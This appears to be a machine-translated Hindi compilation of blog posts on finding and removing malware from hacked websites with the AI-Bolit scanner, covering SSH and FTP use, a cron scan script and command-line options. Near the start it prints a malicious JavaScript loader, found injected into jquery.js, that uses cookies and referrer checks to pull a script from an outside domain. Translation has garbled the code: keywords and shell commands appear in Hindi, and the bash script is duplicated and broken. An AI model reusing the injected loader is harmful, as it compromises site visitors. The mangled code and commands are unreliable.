एआई-बोलिट होस्टिंग पर वायरस और अन्य दुर्भावनापूर्ण कोड के लिए एक प्रभावी स्कैनर है। कमांड लाइन से AI-BOLIT स्कैनर के साथ कैसे काम करें और यह स्क्रिप्ट क्या कर सकती है

💖क्या आपको यह पसंद है?लिंक को अपने दोस्तों के साथ साझा करें
0

आज उन्होंने मुझसे एक ऑनलाइन स्टोर को वायरस से साफ़ करने में मदद मांगी। अप्रत्याशित रूप से, कर्मचारियों में से एक को विज्ञापन देने से इनकार कर दिया गया Google Adwords. पत्र में यह संकेत दिया गया है कि फ़ाइल में jquery.jsएक संदिग्ध कोड दर्ज किया गया है.

सबसे पहले, मैंने ब्राउज़र का उपयोग करके इस फ़ाइल का पथ खोला, लेकिन अवास्ट एंटीवायरस ने इस फ़ाइल पर किसी भी तरह से प्रतिक्रिया नहीं की, हालाँकि मैंने पहले ही दुर्भावनापूर्ण कोड देख लिया था। फिर मैं FileZilla का उपयोग करके ftp के माध्यम से कनेक्ट हुआ और Notepad++ का उपयोग करके फ़ाइल खोलने का प्रयास किया। और यहां मेरे एंटीवायरस ने इस फ़ाइल तक पहुंच को अवरुद्ध कर दिया।

जेएस फ़ाइल को वायरस से साफ़ करने के लिए, मुझे AVAST को 10 मिनट के लिए अक्षम करना पड़ा और फिर फ़ाइल से दुर्भावनापूर्ण लाइनें हटानी पड़ीं।

यदि आपको ऐसी ही समस्या आती है, तो चित्र में दिखाए अनुसार निम्नलिखित कोड या इन पंक्तियों को हटा दें।

वर r=document.referrer; var c=document.कुकी; r1=0; अगर ((r.indexOf("yandex")>0) || (r.indexOf("google")>0) || (r.indexOf("rambler")>0) || (r.indexOf(" मेल")>0)) ( document.cookie = "__ga1=1; समाप्त हो रहा है=बुधवार, 1 मार्च 2020 00:00:00; पथ=/;"; r1=1; ) अन्यथा (यदि (c.indexOf(" __ga1")==-1)(document.cookie = "__ga2=1; समाप्ति=बुध, 1 मार्च 2020 00:00:00; पथ=/;";)) यदि (((c.indexOf("__ga1" )>-1) || (r1==1)) && (c.indexOf("__ga2")==-1)) (document.write(unescape("%3Cscript src="http://google-analyzing .com/urchin.js" type="text/javascript"%3E%3C/script%3E"));)

साइट बैकअप.

इसके बाद, हम एसएसएच एक्सेस के माध्यम से जुड़ते हैं, उदाहरण के लिए, पुट्टी उपयोगिता का उपयोग करके और, यदि संभव हो तो, साइट का एक संग्रह बनाते हैं। ऐसा करने के लिए, बस कंसोल में निम्नलिखित कमांड का उपयोग करें:

टार - सीएफ बैकअप .tar /home/login/site/public_html


*/home/login/site/public_html - साइट की मुख्य निर्देशिका का पूरा पथ

आपको साइट का बैकअप बनाने की ज़रूरत नहीं है, लेकिन किसी महत्वपूर्ण चीज़ को हटाने की कितनी संभावना होगी?

किसी वेबसाइट में वायरस की जाँच करने के लिए अब दो विकल्प हैं

1. साइट की जाँच करें php का उपयोग करनाएआई-बोलिट स्क्रिप्ट, जो विभिन्न वायरस के साथ-साथ php शेल की भी खोज करती है।

2. पूरी साइट को अपने कंप्यूटर पर डाउनलोड करें और इसे अवास्ट एंटीवायरस के साथ चलाएं, लेकिन पहला विकल्प बहुत बेहतर, अधिक सुविधाजनक और बहुत उच्च गुणवत्ता वाला है।

अपने स्थानीय कंप्यूटर पर किसी साइट की सफ़ाई करना

मैंने पहली बार दूसरी विधि का उपयोग किया, इसलिए मैं उसका वर्णन करूँगा। सभी फ़ाइलें (या संग्रह) कंप्यूटर पर डाउनलोड होने के बाद, और उनमें से लगभग 25,000 थीं, मैंने अवास्ट खोला और उन्हें दुर्भावनापूर्ण स्क्रिप्ट के लिए स्कैन करने के लिए साइट फ़ाइलों के साथ फ़ोल्डर निर्दिष्ट किया।

अवास्ट द्वारा स्कैन करने के बाद, वेबसाइट फ़ाइल फ़ोल्डर में दो स्क्रिप्ट वायरस का पता चला:

  • पीएचपी-शेल-जेवी
  • जेएस-रीडायरेक्टर-एफसी

Index.php फ़ाइल में निम्नलिखित कोड शामिल है:

जावास्क्रिप्ट फ़ाइल "ui.datepicker_old.js" में स्क्रिप्ट सामग्री के बिल्कुल नीचे दुर्भावनापूर्ण कोड था। यह कोड हटाया जाना चाहिए!

Ai-Bolit का उपयोग करके किसी वेबसाइट को वायरस से साफ़ करना।

एफ़टीपी विधि.

1. अपने स्थानीय कंप्यूटर पर ऐबोलिट स्क्रिप्ट के साथ संग्रह डाउनलोड करें और इसे अनपैक करें।

2. FileZilla क्लाइंट का उपयोग करके ftp के माध्यम से कनेक्ट करें

3. अनपैक्ड संग्रह फ़ाइलों को साइट /होम/आपकी साइट/पब्लिक_एचटीएमएल की मुख्य निर्देशिका में रखें

4. स्क्रिप्ट http://your Domain/ai-bolit.php चलाएँ

5. रिपोर्ट फ़ाइल नाम के साथ मुख्य निर्देशिका में बनाई जाएगी AI-BOLIT-REPORT.html

यदि स्क्रिप्ट चलाने के बाद यह रिक्त प्रदर्शित करता है सफेद परदा, जिसका अर्थ है कि होस्टिंग सर्वर पर php संस्करण Aibolit के लिए उपयुक्त नहीं है।

ध्यान!यदि आपको किसी निर्देशिका में सभी साइटों की जाँच करने, स्क्रिप्ट को /home/domains/ या /home/ फ़ोल्डर में अपलोड करने की आवश्यकता है, तो Ai-Bolit सभी फ़ोल्डरों के माध्यम से पुनरावर्ती रूप से जाएगा और एक रिपोर्ट जारी करेगा, लेकिन मुझे ऐसा लगता है कि यह एक समय में एक डोमेन की जाँच करना बेहतर है।

कंसोल विकल्प (एसएसएच)

1. पुट्टी प्रोग्राम, या कोई अन्य कंसोल प्रोग्राम लॉन्च करें।

2. होस्ट और पासवर्ड का उपयोग करके सर्वर से कनेक्ट करें।

3. कमांड के साथ साइट की मुख्य निर्देशिका पर जाएं सीडी /होम/आपका लॉगिन/आपकी वेबसाइट/public_html/

4. स्क्रिप्ट को कमांड के साथ लोड करें wget http://www..zip

5. कमांड के साथ ज़िप आर्काइव को अनपैक करें 20160904_112415ai-bolit.zip को अनज़िप करें

6. स्क्रिप्ट चलाएँ php ai-bolit.php

अंदर भागना पृष्ठभूमिकमांड का उपयोग करें: स्क्रीन -डी -एम php ai-bolit.php

7. हम स्क्रिप्ट की जांच करने और "जैसी रिपोर्ट बनाने के लिए प्रतीक्षा कर रहे हैं AI-BOLIT-REPORT.html"सर्वर पर.

कृपया यह भी ध्यान दें कि यदि आपके सर्वर पर 5.3 से नीचे PHP स्थापित है, तो ऐबोलिट एक त्रुटि दिखाएगा और स्कैनिंग शुरू नहीं करेगा। मेरे मामले में, मुझे साइट डाउनलोड करनी थी और इसे अपने सर्वर पर जांचना था।

सर्वर पर रिपोर्ट फ़ाइल बन जाने के बाद, आप इसे अपने कंप्यूटर पर डाउनलोड कर सकते हैं और नियमित ब्राउज़र (क्रोम, फ़ायरफ़ॉक्स, आदि) से देख सकते हैं।

सबसे पहले, आपको "दुर्भावनापूर्ण स्क्रिप्ट" पर रिपोर्ट पर ध्यान देना चाहिए, और फिर या तो इन फ़ाइलों को सावधानीपूर्वक हटा दें या उन्हें मैन्युअल रूप से साफ़ करें, जैसा कि मैं करता हूं।

मैं इंटरनेट पर साइट के लिए निःशुल्क "भुगतान" विषय की तलाश कर रहा था। सौभाग्य से, ऐसी पर्याप्त साइटें हैं। सच है, वे एक-दूसरे की नकल करते हैं =) ऐसे टेम्पलेट्स के अनुभव से, मुझे पता था कि कभी-कभी आपको ऐसी मुफ्त चीज़ों के लिए पूरा भुगतान करना पड़ता है। क्योंकि ऐसे टेम्पलेट बहुत कठिन होते हैं अच्छे लोगवे हर तरह की गंदी चीजें डालते हैं जो सभ्य प्रोग्रामर के लिए बहुत बड़ी परेशानी का कारण बन सकती हैं। मुझे याद है कि मेरी ईएसईटी एंटीवायरसमैं बेस64 पर ढूंढता और शाप देता था। अब वह कसम भी नहीं खाता. मेरे कहने का मतलब यह है कि यदि आप एंटीवायरस से जांच करते हैं, तो इससे मदद नहीं मिलेगी।

ऐ-बोलिट से पहले, मैंने कुछ शब्दों की सामग्री के लिए टोटल कमांडर के साथ फाइलों की जांच की और जो मुझे मिला, उसके आधार पर मैंने उन्हें जांचा और सही किया। लेकिन यह एक बहुत ही कठिन काम है। और मैं एक और अधिक इष्टतम खोजने के लिए निकल पड़ा शीघ्र निर्णयखोजना। और यह पाया गया. यह - एआई-बोलिट होस्टिंग पर वायरस, ट्रोजन, बैकडोर और हैकर गतिविधियों की खोज के लिए एक अनूठी मुफ्त स्क्रिप्ट है।

और इसलिए, यह स्क्रिप्ट क्या कर सकती है:

  • होस्टिंग पर वायरस, सभी प्रकार की दुर्भावनापूर्ण और हैकर स्क्रिप्ट की तलाश करें: हस्ताक्षर के आधार पर शेल, सरल अनुमान के आधार पर शेल - वह सब कुछ जो सामान्य एंटीवायरस आसानी से नहीं ढूंढ पाते हैं।
  • जूमला, वर्डप्रेस, ड्रुपल, बिट्रिक्स सहित बिना किसी अपवाद के सभी सबसे लोकप्रिय सीएमएस के साथ काम करें...
  • दुर्भावनापूर्ण साइटों पर .htaccess में रीडायरेक्ट देखें
  • में कोड सेप/ट्रस्टलिंक/लिंकफीड देखें। php फ़ाइलओह
  • द्वार परिभाषित करें
  • लेखन के लिए खुली निर्देशिकाएँ दिखाएँ
  • टेम्प्लेट में अदृश्य लिंक देखें

इस स्क्रिप्ट की आवश्यकता क्यों है?

एक अनुभवी हैकर लगभग किसी भी वेबसाइट को हैक कर सकता है। और आपकी वेबसाइट कोई अपवाद नहीं हो सकती. वेबसाइट हैक होने का खतरा क्या है? साइट तक पहुंच प्राप्त करने के बाद, एक हमलावर निम्नलिखित कार्य कर सकता है:

  • अपने ट्रैफ़िक को अपनी परियोजनाओं पर "खत्म" करें
  • तीसरे पक्ष को बिक्री के लिए सर्वर और डेटाबेस की सामग्री डाउनलोड करता है
  • साइट पर संपर्क या भुगतान जानकारी को प्रतिस्थापित कर देगा
  • उपयोगकर्ताओं का व्यक्तिगत डेटा डाउनलोड करता है
  • आपकी वेबसाइट पर स्पैम लिंक वाले दरवाजे लगा देगा
  • वेबसाइट पेजों पर वायरस, ट्रोजन या शोषण पेश करेगा, जो आगंतुकों को संक्रमित करेगा
  • आपके सर्वर से स्पैम भेजता है
  • बाद में अनधिकृत प्रवेश के लिए हैक की गई साइट तक पहुंच अन्य हमलावरों को बेच देगा
  • और इसी तरह... यह दुखद है। हाँ?

ऐ-बोलिट आपको अपने होस्टिंग पर बहुत सारे मैलवेयर और संदिग्ध परिवर्तनों का तुरंत पता लगाने की अनुमति देता है, जिससे प्रतिबंधित होने का जोखिम कम हो जाता है। खोज इंजनवायरस के प्रसार और दरवाजे की उपस्थिति के लिए। यह आपको संभावित संभावित सूचना लीक और आपकी साइट से संबंधित अन्य परेशानियों के बारे में तुरंत जानने की अनुमति भी देता है। ठंडा!!!

स्क्रिप्ट का उपयोग कैसे करें

स्क्रिप्ट संग्रह में बहुत स्पष्ट निर्देश हैं। डिफ़ॉल्ट रूप से, "डॉक्टर" स्कैन करता है सामान्य मोडन्यूनतम संख्या में हस्ताक्षर और न्यूनतम संख्या में झूठी सकारात्मकता के साथ।

सत्यापन के दो विकल्प हैं. उन दोनों का वर्णन निर्देशों में किया गया है। मैं केवल पहला - सरलीकृत वाला दूंगा।

ब्राउज़र से लॉन्च विकल्प (अनुशंसित नहीं है क्योंकि यह केवल एक्सप्रेस स्कैनिंग करता है)

  • स्क्रिप्ट के साथ संग्रह डाउनलोड करें (संलग्न फाइलें देखें)
  • अनपैक.ज़िप
  • परिभाषित लाइन में पासवर्ड बदलें('PASS', 'put_any_strong_password_here_8_symbols_min');
  • परिभाषित ("AI_EXPERT", 0) पंक्ति में "विशेषज्ञ" मोड सक्षम करें; // 0 को 1 से बदलें
  • /ai-bolit/ फ़ोल्डर से फ़ाइलों को रूट निर्देशिका में सर्वर पर कॉपी करें
  • Know_files फ़ोल्डर से फ़ाइलें कॉपी करें जो आपके सेमी से मेल खाती हों
  • अपने ब्राउज़र में http://sitename.com/ai-bolit.php?p=My456Pass123 खोलें और रिपोर्ट की प्रतीक्षा करें
  • !!!रिपोर्ट प्रदर्शित करने के बाद, ऐबोलिट से फ़ाइलें और साइट से स्क्रिप्ट हटा दें!!!

बस इतना ही। फिर, आपके सामने एक रिपोर्ट आएगी और आपको बस त्रुटियों का पालन करना होगा और कमजोरियों को ठीक करना होगा।

प्रतिक्रिया

लेखक बहुत मिलनसार व्यक्ति हैं. हमेशा उत्तर देता है. यदि आपके कोई सुझाव या प्रश्न हैं, तो कृपया यहां लिखें:
वेब: http://www.revisium.com/ai/
ईमेल: [ईमेल सुरक्षित]
स्काइप: greg_zemskov

एक समस्याग्रस्त स्थिति है - वायरस वाली एक साइट।

अब मैं दिखाऊंगा कि कैसे इस वायरस को आसानी से ढूंढा और नष्ट किया जा सकता है। पहली चीज़ जो आपको करने की ज़रूरत है वह है साइट को लोकेल में डाउनलोड करना - फ़ाइलों की एक श्रृंखला की जांच करना बहुत आसान है।

यह पाठ वीडियो विवरण से है, इसलिए यह थोड़ा अव्यवस्थित और नीरस है। हालाँकि, मेरी बाकी रचनाएँ)

हम फाइलज़िला डाउनलोड करेंगे। मैं इंस्टॉल किए गए को तुरंत डाउनलोड करूंगा स्थानीय सर्वर- सर्वर खोलें - इसे स्थानीय रूप से चलाने में सक्षम होने के लिए, आपको अचानक इसकी आवश्यकता होगी।

यदि आपके पास एक एंटीवायरस स्थापित है जो फ़ाइलों को तुरंत स्कैन करता है, तो संभावना है कि डाउनलोड करने के दौरान भी आपको कुछ फ़ाइलों में वायरस मिलेंगे। मेरे एंटीवायरस के लॉग में देखें.

मेरे मामले में, मेरी Microsoft Security ने कुछ भी नहीं दिखाया - वायरस उसके लिए अज्ञात था।

खोज के लिए, मैं एक विशेष एंटीवायरस - आइबोलिट का उपयोग करूंगा। डेवलपर वेबसाइट http://revisium.com/ai/
मैं आपको सलाह देता हूं कि आप आएं और सेमिनार देखें। फ़ाइलें अभी भी डाउनलोड हो रही हैं, इसमें काफ़ी समय लगेगा. मेरे पास यह पहले से ही तैयार है स्थानीय प्रति, मैं कल इस एंटीवायरस के साथ खेल रहा था।

तो, काम के लिए हमें अभी भी विंडोज़ के लिए php की आवश्यकता है। यहां डाउनलोड करें http://windows.php.net/download/ नवीनतम संस्करणज़िप संग्रह में विंडोज़ के लिए। ऐसी जगह अनपैक करें जहाँ आप सहज महसूस करें।

ठीक है। तैयारियां पूरी हो चुकी हैं. अब काम करना है.

iBolit के साथ संग्रह डाउनलोड करें।

अंदर तीन फ़ोल्डर हैं:

  • एआई-बोलिट एंटीवायरस का वास्तविक मूल है
  • ज्ञात_फ़ाइलें - विभिन्न इंजनों के लिए एंटी-वायरस फ़ाइल डेटाबेस के संस्करण
  • उपकरण - सहायक उपयोगिता।

तो, आइए वायरस के लिए साइट का उपचार शुरू करें।

  1. एआई-बोलिट फ़ोल्डर से सभी फ़ाइलों को साइट के रूट पर कॉपी करें
  2. यदि हमें पता है कि हमारे पास कौन सा इंजन है, तो हम ज्ञात_फाइल फ़ोल्डर में अपने सीएमएस के साथ फ़ोल्डर का चयन करते हैं और सभी फाइलों को रूट में डालते हैं। मेरे मामले में, वर्डप्रेस इंजन, तो हम वर्डप्रेस के लिए एंटीवायरस डेटाबेस के साथ वायरस का इलाज करेंगे। यदि आप सब कुछ जांचना चाहते हैं, तो आप कर सकते हैं एंटीवायरस डेटाबेससभी इंजनों से भरें - शायद उसे कुछ और मिल जाए)
  3. मैं फिर से भूल गया - आपको iBolit सेटिंग्स में विशेषज्ञ ऑपरेटिंग मोड निर्दिष्ट करने की आवश्यकता है। इसके लिए पाठ संपादकफ़ाइल ai-bolit.php खोलें और पंक्तिfine('AI_EXPERT', 0) ढूंढें; "0" को "1" में बदलें और बस हो गया - विशेषज्ञ मोड चालू हो गया है।
  4. अब हमें अपने ज़िप संग्रह को PHP के साथ किसी फ़ोल्डर में अनपैक करने की आवश्यकता है जहां इसके साथ काम करना सुविधाजनक होगा। हमें एक फ़ाइल चाहिए - php.exe
  5. अब हमें अपने एंटीवायरस की निष्पादन योग्य फ़ाइल को चलाने की आवश्यकता है। ऐसा करने के लिए, ai-bolit.php पर डबल-क्लिक करें। मेरे पास पहले से ही यह विकल्प है कि इस स्क्रिप्ट को कैसे चलाया जाए।

मैं केवल अपलोड फ़ोल्डर और आपके थीम फ़ोल्डर को रखने की सलाह दूंगा। सभी प्लगइन्स डाउनलोड हो जाएंगे, सेटिंग्स डेटाबेस में रहेंगी - वायरस उन्हें छू नहीं पाएंगे। सभी फ़ाइलों की विषयवस्तु को मैन्युअल रूप से जाँचें - सौभाग्य से वहाँ उनमें से बहुत सारे नहीं हैं, यदि साइट एक अनाड़ी लेआउट डिजाइनर द्वारा नहीं बनाई गई थी। और इंजन में बाकी सब कुछ फिर से भरें। यह सबसे विश्वसनीय तरीका है.

और मैं आपको यह भी याद दिलाता हूं कि आपके पूरे होस्टिंग खाते में वायरस होने की संभावना है (बहुत कम ही वे विभिन्न उपयोगकर्ताओं के खातों के बीच कूदने का प्रबंधन करते हैं, केवल तभी जब होस्टिंग प्रशासक एक कुटिल व्यक्ति हो।)

यदि किसी कारण से iBolit को साइट से हटा दिया जाता है, तो आप हमेशा मुझसे साइट के लिए एंटीवायरस डाउनलोड कर सकते हैं

वायरस दुखद हैं(

पुनश्च: पहले से पाए गए वायरस को साफ़ करने के तरीके पर दो लेख:

  • सरल - किसी वेबसाइट से वायरस को निःशुल्क कैसे हटाएं
  • उन्नत के लिए -

संभवतः वेबसाइट बनाने वाले प्रत्येक व्यक्ति को साइट पर वायरस और ट्रोजन का सामना करना पड़ता है। पहली समस्या समय रहते समस्या पर ध्यान देना है, इससे पहले कि प्रोजेक्ट खोज इंजन से निराशावादी हो जाएं या होस्टर के लिए बोझ बन जाएं (डीडीओएस, स्पैम के लिए)।

यह आलेख तब लिखा जा रहा है जब, विंडोज़ चलाने वाली मशीन के नियमित बैकअप के दौरान, ईएसईटी वेबसाइट का स्रोत कोड चालाक सुरक्षाअचानक उसने उन तस्वीरों पर गाली देना शुरू कर दिया, जिन्हें वह एक वायरस मानता था। यह पता चला कि फाइल्समैन बैकडोर को चित्रों का उपयोग करके साइट पर अपलोड किया गया था।

छेद यह था कि वह स्क्रिप्ट जो उपयोगकर्ताओं को साइट पर चित्र अपलोड करने की अनुमति देती थी, यह जाँचती थी कि चित्र केवल फ़ाइल एक्सटेंशन द्वारा लोड किया जा रहा था। सामग्री की बिल्कुल भी जाँच नहीं की गई है. ऐसा करने की कोई आवश्यकता नहीं है;) परिणामस्वरूप, किसी भी PHP फ़ाइल को छवि की आड़ में साइट पर अपलोड किया जा सकता है। लेकिन हम छिद्रों के बारे में बात नहीं कर रहे हैं...

मुद्दा यह है कि कार्य वायरस और ट्रोजन के लिए सभी साइट फ़ाइलों की दैनिक जाँच करना था।

वायरस के लिए किसी वेबसाइट की ऑनलाइन जाँच करना

वायरस के लिए किसी भी वेबसाइट की ऑनलाइन जांच इन उद्देश्यों के लिए बिल्कुल भी उपयुक्त नहीं है। ऑनलाइन स्कैनर एक खोज इंजन रोबोट की तरह व्यवहार करते हैं, जो क्रमिक रूप से हर चीज से गुजरते हैं उपलब्ध पृष्ठसाइट। साइट के अगले पृष्ठ पर संक्रमण साइट के अन्य पृष्ठों के लिंक के माध्यम से होता है। सम्मान. यदि किसी हमलावर ने किसी चित्र का उपयोग करके आपकी साइट पर पिछले दरवाजे से अपलोड किया है और साइट के पृष्ठों पर कहीं भी इस चित्र का कोई लिंक नहीं है और साइट को विकृत नहीं किया है, जैसे पृष्ठों पर वायरस डाल दिया है, तो ऑनलाइन जाँचवायरस के लिए वेबसाइट को यह चित्र नहीं मिलेगा और वायरस भी नहीं मिलेगा।

आप पूछते हैं, कोई हमलावर ऐसा क्यों करेगा? पिछला दरवाज़ा क्यों अपलोड करें और कुछ न करें? मैं उत्तर दूंगा - स्पैम के लिए, DDoS के लिए। अन्य दुर्भावनापूर्ण गतिविधि के लिए जो साइट पृष्ठों पर किसी भी तरह से प्रतिबिंबित नहीं होती है।

एक शब्द में, मन की पूर्ण शांति के लिए वायरस के लिए किसी वेबसाइट की ऑनलाइन जाँच करना पूरी तरह से बेकार है।

वायरस और ट्रोजन के लिए वर्डप्रेस साइट की जाँच के लिए प्लगइन

वर्डप्रेस के लिए एक बेहतरीन एंटीवायरस प्लगइन है। यह कहा जाता है । मेरे मामले में, इसने फाइल्समैन से पूरी तरह से तस्वीरें ढूंढ लीं और साइट को वायरस से साफ कर दिया। लेकिन उसके पास है महत्वपूर्ण कमी. स्कैन के दौरान, यह सर्वर पर भारी भार डालता है क्योंकि यह बस सभी फाइलों को क्रमिक रूप से देखता है। इसके अलावा, बॉक्स से चेक आउट केवल मैन्युअल रूप से किया जाता है। प्लगइन के साथ साइट सत्यापन को स्वचालित करना संभव नहीं है।

खैर, आप वर्डप्रेस का उपयोग किए बिना वायरस पकड़ सकते हैं, आपको कुछ सार्वभौमिक चाहिए।

नियमित एंटीवायरस से साइट सामग्री की जाँच करना

जैसा कि ऊपर उल्लेख किया गया है, बैकअप के दौरान एक नियमित डेस्कटॉप एंटीवायरस द्वारा दुर्घटनावश समस्याओं का पूरी तरह से पता लगाया गया था। बेशक, आप हर दिन पूरी साइट डाउनलोड कर सकते हैं और इसे नियमित एंटीवायरस से स्कैन कर सकते हैं। यह सब काफी व्यावहारिक है.

  • सबसे पहले, मैं स्वचालन चाहता हूँ। ताकि चेक इन हो जाए स्वचालित मोडऔर परिणामों के आधार पर एक तैयार रिपोर्ट तैयार की गई।
  • दूसरी बात, ऐसी साइटें हैं जिन्हें हर बार डाउनलोड करना यथार्थवादी नहीं है,

एआई-बोलिट का प्रयास कर रहा हूं

मैंने परिचय में कुछ देरी कर दी। सभी खोजों के परिणामस्वरूप, एक अद्भुत चीज़ मिली मुफ़्त एंटीवायरससाइट के लिए. . इस एंटीवायरस का मतलब है विभिन्न योजनाएंइसके प्रयोग। मैंने इसे ssh के माध्यम से उपयोग किया।

मुझे यह पता नहीं चला है कि इसका उपयोग साझा होस्टिंग पर किया जा सकता है या नहीं, लेकिन मुझे लगता है कि यह संभव है। एआई-बोलिट PHP में लिखा गया है और इसे ब्राउज़र से लॉन्च किया जा सकता है। इसलिए, विशुद्ध रूप से तकनीकी रूप से, यह संभवतः एक साझा मंच पर संभव है।

महत्वपूर्ण! ऐबोलिट वायरस के लिए किसी वेबसाइट का इलाज नहीं करता - यह केवल उन्हें ढूंढता है और एक रिपोर्ट देता है कि वह किन फाइलों को खतरनाक मानता है। और आप स्वयं तय करें कि उनके साथ क्या करना है। इसलिए, केवल मूर्खतापूर्ण तरीके से एक बटन दबाने और साइट को ट्रोजन से ठीक करने से काम नहीं चलेगा।

एसएसएच के साथ वीडीएस पर एआई-बोलिट का उपयोग कैसे करें

ऐबोलिट के पास इस एंटीवायरस के उपयोग पर निर्देश और मास्टर कक्षाएं हैं। सामान्य तौर पर, अनुक्रम सरल है:

  • डाउनलोड करना
  • सर्वर पर अनपैक करें (मैंने /root/ai पर अनपैक किया है)
  • फिर ssh कंसोल से php /root/ai/ai-bolit/ai-bolit.php चलाएँ
  • साइट के आकार के आधार पर सत्यापन में घंटों लग सकते हैं
  • जाँच के परिणामों के आधार पर, एक रिपोर्ट फ़ाइल AI-BOLIT-REPORT- तैयार की जाएगी<дата>-<время>.html

रिपोर्ट फ़ाइल समस्याग्रस्त फ़ाइलें, यदि कोई हो, दिखाएगी।

सर्वर पर भारी लोड

वायरस के लिए किसी वेबसाइट की स्वचालित जाँच करते समय आपके सामने आने वाली मुख्य समस्या सर्वर पर लोड है। सभी एंटीवायरस समान तरीके से काम करते हैं, सभी उपलब्ध फ़ाइलों को क्रमिक रूप से खोजते हैं। और ऐसा लगता है कि ऐबोलिट यहां कोई अपवाद नहीं है। यह बस सभी फाइलें लेता है और उन्हें एक-एक करके जांचता है। भार बढ़ जाता है और यह लंबे समय तक चल सकता है, जो उत्पादन में स्वीकार्य नहीं है।

लेकिन आयबोलिट के पास एक अद्भुत अवसर है (बशर्ते कि आपके पास रूट एक्सेस के साथ एक पूर्ण सर्वर या वीडीएस हो)। सबसे पहले, ऐबोलिट के लिए, आप जांचने के लिए फ़ाइलों की एक सूची तैयार कर सकते हैं, और फिर इस सूची को फ़ीड कर सकते हैं। तब ऐबोलिट बस इस सूची के माध्यम से चलेगा।

सूची तैयार करने के लिए, आप किसी भी सर्वर विधि का उपयोग कर सकते हैं। मैं इस बैश स्क्रिप्ट के साथ समाप्त हुआ:

# bash /root/ai/run.sh # https://revisium.com/kb/ai-bolit-console-faq.html DOMAIN='site' AI_PATH='/root/ai' NOW=$(date +' %F-%k-%M-%S") # आप पासवर्ड एक्सेस के साथ एक सार्वजनिक फ़ोल्डर बना सकते हैं REPORT_PATH='$AI_PATH/reports/$DOMAIN-$NOW.html' SCAN_PATH='/home/azzrael/web/$ डोमेन/ public_html/" SCAN_DAYS=90 #php /home/admin/ai/ai-bolit/ai-bolit.php --mode=1 --path=$SCAN_PATH --रिपोर्ट=$REPORT_PATH # केवल X में परिवर्तित फ़ाइलों को स्कैन करें दिन # AI-BOLIT-DOUBLECHECK.php को AIbolit द्वारा --with-2check पर हार्डकोड किया गया है!!! $SCAN_PATH -प्रकार f -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" खोजें #$SCAN_PATH -प्रकार f -नाम "*.ph*" -ctime -$SCAN_DAYS > "ढूंढें $AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" #$SCAN_PATH -प्रकार f -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" #$SCAN_PATH -प्रकार ढूंढ़ें f -नाम "*.ph*" -o -नाम "*.gif" -ctime -$SCAN_DAYS > "$AI_PATH/ai-bolit/AI-BOLIT-DOUBLECHECK.php" php "$AI_PATH/ai-bolit/ai -bolit.php" --mode=1 --report=$REPORT_PATH --with-2check #इतिहास -c

# बैश /रूट/एआई/रन.श

# https://revisium.com/kb/ai-bolit-console-faq.html

डोमेन = "साइट"

AI_PATH = "/root/ai"

अभी = $(तारीख + "%F-%k-%M-%S")

# आप पासवर्ड एक्सेस के साथ एक सार्वजनिक फ़ोल्डर बना सकते हैं

रिपोर्ट_पथ = "$AI_PATH/रिपोर्ट/$DOMAIN-$NOW.html"

SCAN_PATH = "/home/azzrael/web/$DOMAIN/public_html/"

स्कैन_दिन = 90

#php /home/admin/ai/ai-bolit/ai-bolit.php --mode=1 --path=$SCAN_PATH --रिपोर्ट=$REPORT_PATH

पीएचपी "$AI_PATH/ai-bolit/ai-bolit.php"-- मोड = 1 -- रिपोर्ट = $REPORT_PATH -- साथ - 2चेक

#इतिहास -सी

यहां आप देख सकते हैं कि खोज कमांड के माध्यम से हम पिछले SCAN_DAYS के दौरान बनाई गई सभी फ़ाइलों को एकत्र करते हैं, उन्हें AI-BOLIT-DOUBLECHECK.php सूची में सहेजते हैं (वैसे, उपयोग के समय सूची फ़ाइल का नाम बदलना असंभव था) ), फिर इस सूची को ऐबोलिट को फ़ीड करें। SCAN_DAYS एक दिन के बराबर हो सकता है. यदि आप दैनिक क्रॉन में bash /root/ai/run.sh डालते हैं, तो स्कैन की जाने वाली फ़ाइलों की सूची बहुत बड़ी नहीं हो सकती है। सम्मान. चेक में अधिक समय नहीं लगेगा और सर्वर पर भारी लोड नहीं पड़ेगा।

AI-BOLIT स्कैनर को मोड में प्रारंभ करते समय सबसे बड़ी कार्यक्षमता उपलब्ध होती है कमांड लाइन. यह Windows/Unix/Mac OS

कृपया ध्यान दें कि स्कैनर चलाने के लिए PHP 7.1 और उच्चतर का कंसोल संस्करण आवश्यक है। अधिक प्रारंभिक संस्करणआधिकारिक तौर पर समर्थित नहीं हैं. जाँच करना वर्तमान संस्करण php -v कमांड

AI-BOLIT स्कैनर कमांड लाइन पैरामीटर के साथ सहायता

मदद दिखायें

php ai-bolit.php --help

php ai-bolit.php --स्किप=jpg,png,gif,jpeg,JPG,PNG,GIF,bmp,xml,zip,rar,css,avi,mov

केवल कुछ एक्सटेंशन ही स्कैन करें

php ai-bolit.php --स्कैन=php,php5,pht,phtml,pl,cgi,htaccess,संदिग्ध,tpl

सुरक्षा विशेषज्ञों को भेजने के लिए एक संगरोध फ़ाइल तैयार करें। पासवर्ड के साथ एक संग्रह AI-QUARANTINE-XXXX.zip बनाया जाएगा।

php ai-bolit.php --संगरोध

स्कैनर को "पैरानॉयड" मोड में चलाएं (सबसे विस्तृत रिपोर्ट प्राप्त करने के लिए अनुशंसित)

php ai-bolit.php --mode=2

php ai-bolit.php --mode=1

दुर्भावनापूर्ण कोड के लिए एक फ़ाइल "pms.db" की जाँच करें

php ai-bolit.php -jpms.db

स्कैनर को 512 एमबी की मेमोरी साइज के साथ चलाएं

php ai-bolit.php --memory=512M

अधिकतम स्कैन की गई फ़ाइल का आकार 900Kb पर सेट करें

php ai-bolit.php --size=900K

स्कैन करते समय फ़ाइलों के बीच 500 एमएस रोकें (लोड कम करने के लिए)

php ai-bolit.php --delay=500

ईमेल द्वारा स्कैन रिपोर्ट भेजें [ईमेल सुरक्षित]

php ai-bolit.php [ईमेल सुरक्षित]

फ़ाइल /home/scanned/report_site1.html में एक रिपोर्ट बनाएं

php ai-bolit.php --report=/home/scanned/report_site1.html

/home/s/site1/public_html/ निर्देशिका को स्कैन करें (यदि --report=report_file विकल्प निर्दिष्ट नहीं है तो डिफ़ॉल्ट रिपोर्ट वहां बनाई जाएगी)

php ai-bolit.php --path=/home/s/site1/public_html/

स्कैनिंग पूरी होने पर कमांड निष्पादित करें।

php ai-bolit.php --cmd='~/postprocess.sh'

